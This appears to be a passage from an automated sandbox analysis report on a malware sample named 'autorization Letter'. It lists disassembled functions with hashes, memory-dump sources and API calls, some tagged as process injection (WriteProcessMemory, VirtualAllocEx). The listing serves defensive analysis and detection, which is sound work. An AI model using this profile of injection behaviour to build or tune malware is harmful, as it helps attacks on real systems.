                                                                  • Snapshot File: hcaresult_1_2_16b0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID: Create
                                                                  • String ID:
                                                                  • API String ID: 2289755597-0
                                                                  • Opcode ID: bacb30e7428e0e82b2d6288364109ecd1f5ee2f3aee76e3b50e35d74650d58e2
                                                                  • Instruction ID: 3c95bdfdf85e3d56b8c3124a536af1ad719bf0f77793300726684ada23bef2e0
                                                                  • Opcode Fuzzy Hash: bacb30e7428e0e82b2d6288364109ecd1f5ee2f3aee76e3b50e35d74650d58e2
                                                                  • Instruction Fuzzy Hash: 8F41DFB1C0071DCFDB24DFA9C884ADEBBB5BF49304F20806AD509AB255DB756986CF90
                                                                  Function 07930530 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 657 7930530-7930586 660 7930596-79305d5 WriteProcessMemory 657->660 661 7930588-7930594 657->661 663 79305d7-79305dd 660->663 664 79305de-793060e 660->664 661->660 663->664
                                                                  APIs
                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 079305C8
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: 87996d6218511ec3af11673489660986553daf99ad797cf9681b33d9747b4ca3
                                                                  • Instruction ID: 00276217f291373fcb81027de8d990f2ac2bfb74b4520edbc2ae34a3c8c1a0b1
                                                                  • Opcode Fuzzy Hash: 87996d6218511ec3af11673489660986553daf99ad797cf9681b33d9747b4ca3
                                                                  • Instruction Fuzzy Hash: D8212CB5D003199FCB10DFAAC8847EEBBF5FF48314F10852AE919A7240C7789544CBA0
                                                                  Function 07930538 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 668 7930538-7930586 670 7930596-79305d5 WriteProcessMemory 668->670 671 7930588-7930594 668->671 673 79305d7-79305dd 670->673 674 79305de-793060e 670->674 671->670 673->674
                                                                  APIs
                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 079305C8
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: 3c778f315b6c5ea225913a2a0e1a72af9d807787d377be647f03b8edb4562a99
                                                                  • Instruction ID: 558ef7c740ae35832161398affb904984290194ad2bc40c30722dda3f767d448
                                                                  • Opcode Fuzzy Hash: 3c778f315b6c5ea225913a2a0e1a72af9d807787d377be647f03b8edb4562a99
                                                                  • Instruction Fuzzy Hash: 132119B5D003599FCB10DFAAC985BEEBBF5FF48314F10842AE919A7240D7789944CBA1
                                                                  Function 016BD6B8 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016BD747
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2157051692.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_16b0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: ba7a5f664a3bedd4e5bddc47deb05bbba47f7642f7f77642e2ffd1cd7f8e88c8
                                                                  • Instruction ID: 6a0ba1fd719c9b2f7f92fb1f3ad5fd1cd42091d47d41b70273a726d3f867bd0b
                                                                  • Opcode Fuzzy Hash: ba7a5f664a3bedd4e5bddc47deb05bbba47f7642f7f77642e2ffd1cd7f8e88c8
                                                                  • Instruction Fuzzy Hash: 7A21E5B5900248EFDB10CF9AD984AEEBFF4FB48314F14801AE918A7350D379A954CFA5
                                                                  Function 07930620 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 079306A8
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID:
                                                                  • API String ID: 1726664587-0
                                                                  • Opcode ID: bdc908378bf7a306f9929e23feb8e26f06d190039f18b43454c831a56e607851
                                                                  • Instruction ID: 18ff47360f5c7cfbe2400143e7e6d60b4bd7fae045bbc3f0ce04f5faeb1a357c
                                                                  • Opcode Fuzzy Hash: bdc908378bf7a306f9929e23feb8e26f06d190039f18b43454c831a56e607851
                                                                  • Instruction Fuzzy Hash: 3C214AB1D003099FCB10DFA9C9846EEBBF5FF48324F10852AD918A7240D7789541CBA0
                                                                  Function 07930628 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 079306A8
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID:
                                                                  • API String ID: 1726664587-0
                                                                  • Opcode ID: 750bfb37f61fc22015913280cda0490d32af5c7fb61ae493c6fda6380781add2
                                                                  • Instruction ID: 003cc7102d9f8aebaf2d23ad3428f2c96b538a427b72c39189b00db4957129bd
                                                                  • Opcode Fuzzy Hash: 750bfb37f61fc22015913280cda0490d32af5c7fb61ae493c6fda6380781add2
                                                                  • Instruction Fuzzy Hash: C5213AB1D003499FCB10DFAAC884AEEFBF5FF48314F50842AE919A7240CB799540CBA1
                                                                  Function 016BD6C0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016BD747
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2157051692.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_16b0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: 68e302e7e0df7b7c75e9d5723c37adbb8dbc1af51f25b051a7e309e24e3ec4dd
                                                                  • Instruction ID: ba4aa16a661d6f787cefb9fb374bac698df8b29da3ba322ce6975a2214db9f04
                                                                  • Opcode Fuzzy Hash: 68e302e7e0df7b7c75e9d5723c37adbb8dbc1af51f25b051a7e309e24e3ec4dd
                                                                  • Instruction Fuzzy Hash: 2521C4B5D002489FDB10CF9AD984AEEBFF9FB48314F14841AE918A7350D379A944CFA5
                                                                  Function 07930470 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 079304E6
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 797c8dd9cc0cd46b60a9c03ee58961d4f8d3e583ddbe38a23d776639efcb4702
                                                                  • Instruction ID: f8601bda4dc3e2270f9a9a0add79d7f682eabbdcc54b5d8d62c452431c0f5492
                                                                  • Opcode Fuzzy Hash: 797c8dd9cc0cd46b60a9c03ee58961d4f8d3e583ddbe38a23d776639efcb4702
                                                                  • Instruction Fuzzy Hash: C5114AB59002099FDB10DFA9C844BEEBBF5EF89320F108419D519A7290CB359544CBA0
                                                                  Function 07930478 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 079304E6
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: aef1cb37067b7210fcabe08c28f9c9e82db85ae7654f8efe75c8fa3d2dd3c248
                                                                  • Instruction ID: 9fc002c072f384618e55105656feb837ce9207bbab32518bbe1d62d52804a5c1
                                                                  • Opcode Fuzzy Hash: aef1cb37067b7210fcabe08c28f9c9e82db85ae7654f8efe75c8fa3d2dd3c248
                                                                  • Instruction Fuzzy Hash: F11137B19002499FDB10DFAAC844AEFBFF5EF48314F108419E919A7250CB79A540CFA1
                                                                  Function 016BAFD8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 016BB03E
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2157051692.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_16b0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: 830744e7d13a67582298b6f1748d9d479d1e67294e7aa9f0301bf566710be91f
                                                                  • Instruction ID: 0f3c7439dc9add5e16632bc741ce516db74ea1ce118d8faa044e9f89e9a21053
                                                                  • Opcode Fuzzy Hash: 830744e7d13a67582298b6f1748d9d479d1e67294e7aa9f0301bf566710be91f
                                                                  • Instruction Fuzzy Hash: 3B110FB5C002498FDB10CF9AC884AEEFBF4AB88210F10841AD928A7200D379A585CFA1
                                                                  Function 079315E8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 07935185
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost
                                                                  • String ID:
                                                                  • API String ID: 410705778-0
                                                                  • Opcode ID: b4c920d48b7e093c1abed2b70727fc925a3e7d20ee412454b45e5c083538362a
                                                                  • Instruction ID: a367fefce699a1b8511550ae173abe33fc4e1cd15d9b6123620aa136a0faba32
                                                                  • Opcode Fuzzy Hash: b4c920d48b7e093c1abed2b70727fc925a3e7d20ee412454b45e5c083538362a
                                                                  • Instruction Fuzzy Hash: 851106B58003499FCB10DF99C884BEEBBF8EB48314F108419E918B7200C379A954CFE1
                                                                  Function 07935120 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 07935185
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost
                                                                  • String ID:
                                                                  • API String ID: 410705778-0
                                                                  • Opcode ID: f665480bcdac1c07064f3e500aee68d3a14d02d660392a9a2513276c3dfed223
                                                                  • Instruction ID: aad19419a5750284cd75eed82ed8385e1997e9f75826f1ba1720ec0a6c49ea73
                                                                  • Opcode Fuzzy Hash: f665480bcdac1c07064f3e500aee68d3a14d02d660392a9a2513276c3dfed223
                                                                  • Instruction Fuzzy Hash: F41106B58003499FCB10CF99C985BDEBBF8EB48314F10885AD558B7240C379A544CFE1
                                                                  Function 058AD121 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: 9ea5a4c81cec4ac97f45057d83acd8e5ca97275f4d6c5d5535277ef29c8f08b5
                                                                  • Instruction ID: 769bf5b2ba350e8b05c2e13d6ceaad0acd102b340bad2cb356472781d54a8a9c
                                                                  • Opcode Fuzzy Hash: 9ea5a4c81cec4ac97f45057d83acd8e5ca97275f4d6c5d5535277ef29c8f08b5
                                                                  • Instruction Fuzzy Hash: 50D11C3591120ACFDF04DFA8C4949EDBBB1FF48315B258655D806AB259EB30BE86CF90
                                                                  Function 058AD161 Relevance: 1.4, Strings: 1, Instructions: 197COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID: 0-3916222277
                                                                  • Opcode ID: c59cc2808fb8aa74b98cb8a28c09453b0bb3efbd1a0c58b0dfa865a8f38b61fb
                                                                  • Instruction ID: 5d0bee27e05525aafb04db7859704fc496922fec6dab2b93375778a2b7c08297
                                                                  • Opcode Fuzzy Hash: c59cc2808fb8aa74b98cb8a28c09453b0bb3efbd1a0c58b0dfa865a8f38b61fb
                                                                  • Instruction Fuzzy Hash: A4A1DB3591064ACFCF05DFA4C4848DDBBB1FF58315B218655D816AB259EB30AE8ACF90
                                                                  Function 058A05D0 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (aq
                                                                  • API String ID: 0-600464949
                                                                  • Opcode ID: 4fc5fecd636103b9a3306f95188ffde8d42ee8e9cd23ebd756abd196ca4be688
                                                                  • Instruction ID: 6bfea8b6a394bd2c7ffea1e1841d032791dc4e4fd2d3a18fb766cf173fe40e88
                                                                  • Opcode Fuzzy Hash: 4fc5fecd636103b9a3306f95188ffde8d42ee8e9cd23ebd756abd196ca4be688
                                                                  • Instruction Fuzzy Hash: FA313862B083459FDB19DFB9981857F7FA6AFD5200F1484BAD805C7682EE309C02C7A2
                                                                  Function 058AD510 Relevance: .7, Instructions: 729COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 64dedf7dab02c9a2d511607b6e248d50296fe5edba126cec2ec5aa5e17596af8
                                                                  • Instruction ID: 4d9b89124cdf428658454366dc6e7c029ea1685ffad282a959febaa9c2db3ba3
                                                                  • Opcode Fuzzy Hash: 64dedf7dab02c9a2d511607b6e248d50296fe5edba126cec2ec5aa5e17596af8
                                                                  • Instruction Fuzzy Hash: 63725031910609CFDB15EF68C858AADBBB1FF45305F008299D94AA7265EF30AEC5CF91
                                                                  Function 058AA4B9 Relevance: .6, Instructions: 554COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5abdaef831b17e4989ad77ea93fee1b19d209e1d673e721730d91938674b89fb
                                                                  • Instruction ID: 98f7cae24b8d922aa452fa464713eb346f5aa603f9d5bac69b3fb2ca096c9568
                                                                  • Opcode Fuzzy Hash: 5abdaef831b17e4989ad77ea93fee1b19d209e1d673e721730d91938674b89fb
                                                                  • Instruction Fuzzy Hash: 2742D731E107198BDB25DF68C8846EDB7B2BF89304F158699D859BB211EB30AE85CF50
                                                                  Function 058AEDE0 Relevance: .5, Instructions: 500COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 94e7bea59ff36a7320edea0ca113a9f0223f40d14e589a8492b0a522fed189ca
                                                                  • Instruction ID: 056f05255379d554ad20889157d1ce05cb6d5f20f79bae653309388a83b24a83
                                                                  • Opcode Fuzzy Hash: 94e7bea59ff36a7320edea0ca113a9f0223f40d14e589a8492b0a522fed189ca
                                                                  • Instruction Fuzzy Hash: 06222B35A00205CFDB14EF69C898A9DB7B2FF88304F1485A8E94AEB365DB71AD45CF50
                                                                  Function 058A170C Relevance: .3, Instructions: 302COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6ae01d220c212f040cfb10bbcc823ef441707ac04607df5801a21ed9acc0d309
                                                                  • Instruction ID: 37523f6ccb893d2b30d3637e09360d5e2710bacd6e0f303c597659cebaf3d341
                                                                  • Opcode Fuzzy Hash: 6ae01d220c212f040cfb10bbcc823ef441707ac04607df5801a21ed9acc0d309
                                                                  • Instruction Fuzzy Hash: C8C16F35B006018FDB08EF79C89869977A2FF88300F15857DD80AAB369EF75AC85CB51
                                                                  Function 058A16F0 Relevance: .3, Instructions: 269COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8e9695cd0c592920e413825c0bdf7a9dc1ce9402469c1ffd35d41e8495d38955
                                                                  • Instruction ID: 279a3d289025f121607c759bdf6adfb99d8347d012b5fa9f75ec94d99becc210
                                                                  • Opcode Fuzzy Hash: 8e9695cd0c592920e413825c0bdf7a9dc1ce9402469c1ffd35d41e8495d38955
                                                                  • Instruction Fuzzy Hash: EEB17335B006018FDB48EF68D89469977A2FF88300F15857DDC0AAB369DF75AC85CB91
                                                                  Function 058A2258 Relevance: .3, Instructions: 266COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 40a7aaa84fddafb33a53f4b0e52dec7c38c94dc0278dbac984ec8fb4c86d8967
                                                                  • Instruction ID: 9493694531d0367761544e70260b37637058e8342245483fea9c830bdadf475f
                                                                  • Opcode Fuzzy Hash: 40a7aaa84fddafb33a53f4b0e52dec7c38c94dc0278dbac984ec8fb4c86d8967
                                                                  • Instruction Fuzzy Hash: 35B16F35B006018FDB58EF68C89869977A2FF88300F15857DDC0AAB366DF75AC85CB91
                                                                  Function 058A3EB0 Relevance: .2, Instructions: 216COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3391d83a0915eb75661cc66191f189b73f7be671a5bd645aca90eec866dbe36b
                                                                  • Instruction ID: 16186f13783654600cf2d5e7f99f7ff9364b089b43985f422343a7298302ced8
                                                                  • Opcode Fuzzy Hash: 3391d83a0915eb75661cc66191f189b73f7be671a5bd645aca90eec866dbe36b
                                                                  • Instruction Fuzzy Hash: 28710332A04245CFEF15DBA8C8946ADBBB2FF85300F14446ED406DB3A2DB789D4ACB51
                                                                  Function 058ACEA0 Relevance: .2, Instructions: 197COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9b95c7426acbf4153e34b9b994defdae320da4d1ccc916ed84a2b0d4fa98757d
                                                                  • Instruction ID: 5c5d56bc65686792ee8025bba60f161500707a9c7f6a8fc046e1bf784af26655
                                                                  • Opcode Fuzzy Hash: 9b95c7426acbf4153e34b9b994defdae320da4d1ccc916ed84a2b0d4fa98757d
                                                                  • Instruction Fuzzy Hash: 7291077190060ACFDB41DF68C880999FBF5FF89310B14C79AE819EB255EB30E985CB80
                                                                  Function 058A5810 Relevance: .2, Instructions: 195COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 52cd19654d472a1bf88c7a83e72bfe70004bba20701ff58fc954b4e4e66e2ad0
                                                                  • Instruction ID: 9f9c3dd6d19a35a235844c4bf0b99755ebe864db99e1a88d5afa25de15cf2729
                                                                  • Opcode Fuzzy Hash: 52cd19654d472a1bf88c7a83e72bfe70004bba20701ff58fc954b4e4e66e2ad0
                                                                  • Instruction Fuzzy Hash: 8881CE75A11208AFDB15DFA8D884DAEBBB2FF49324B154099F906AB361D731EC81CF50
                                                                  Function 058AEDD1 Relevance: .2, Instructions: 165COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 467fbb151cefa2463569fe4eea2ea6ac3b7211aab7f18c1054a684dcbf1ef2f9
                                                                  • Instruction ID: 0427c0f10dd7f06929103d8b4aa3866102374782054d61e305795be49c24359d
                                                                  • Opcode Fuzzy Hash: 467fbb151cefa2463569fe4eea2ea6ac3b7211aab7f18c1054a684dcbf1ef2f9
                                                                  • Instruction Fuzzy Hash: 2A518A316106008FDB14EF29C898B9977F6FF89310F1486B8D946DB3A5DB70AC05CB61
                                                                  Function 058A69B8 Relevance: .1, Instructions: 149COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9bace29385e12524434dba85e34aede08179105121f05f9de8141b3a14bbf9c3
                                                                  • Instruction ID: 53077b79a39a4ac2db635e37ca00da5f58e0887027b1fd8fd75ba9a7e11ad829
                                                                  • Opcode Fuzzy Hash: 9bace29385e12524434dba85e34aede08179105121f05f9de8141b3a14bbf9c3
                                                                  • Instruction Fuzzy Hash: 1E510634A10605CFCB04EF68C8989ADBBB6FF89704F1585A9E506DB375EB70AC45CB50
                                                                  Function 058ACE90 Relevance: .1, Instructions: 148COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: da37adf61e124acead21bd560cd5cd9d1876c9fa3a5ee95baacec6fd956280eb
                                                                  • Instruction ID: 5cd2e5b2d0f077fdb2923ff16faf286185942ac0e7c7f4e04f6dbe0c5977f740
                                                                  • Opcode Fuzzy Hash: da37adf61e124acead21bd560cd5cd9d1876c9fa3a5ee95baacec6fd956280eb
                                                                  • Instruction Fuzzy Hash: E4512A7191070ACFDB41EF68C880999FBB5FF89310B14C75AE859EB255EB70E985CB80
                                                                  Function 058A69C8 Relevance: .1, Instructions: 143COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 38e36412e389c5695b3b78b5e7e57388ff961b7587fa4f64e903b906f70cad7b
                                                                  • Instruction ID: 1f57911fa8a1517f82c34a66631e0e371afe277cc3306718393765adab5441cb
                                                                  • Opcode Fuzzy Hash: 38e36412e389c5695b3b78b5e7e57388ff961b7587fa4f64e903b906f70cad7b
                                                                  • Instruction Fuzzy Hash: E451F534A10605CFCB04EF68C8989ADBBB6FF89704B1585A9E506DB375EB71EC45CB40
                                                                  Function 058AAD20 Relevance: .1, Instructions: 137COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3912ae0517c841c2b501031437fce156dcee27095036684e6d16a5a742f05330
                                                                  • Instruction ID: 3e780a84a531fc97b60eab97f735ffd20840bee1af94f1ba3d3089a3821d79ce
                                                                  • Opcode Fuzzy Hash: 3912ae0517c841c2b501031437fce156dcee27095036684e6d16a5a742f05330
                                                                  • Instruction Fuzzy Hash: CF5158357006048FEB18DB68D488AAEBBF6FF88614F048569E846DB761EB74EC41CB51
                                                                  Function 058A0448 Relevance: .1, Instructions: 130COMMON
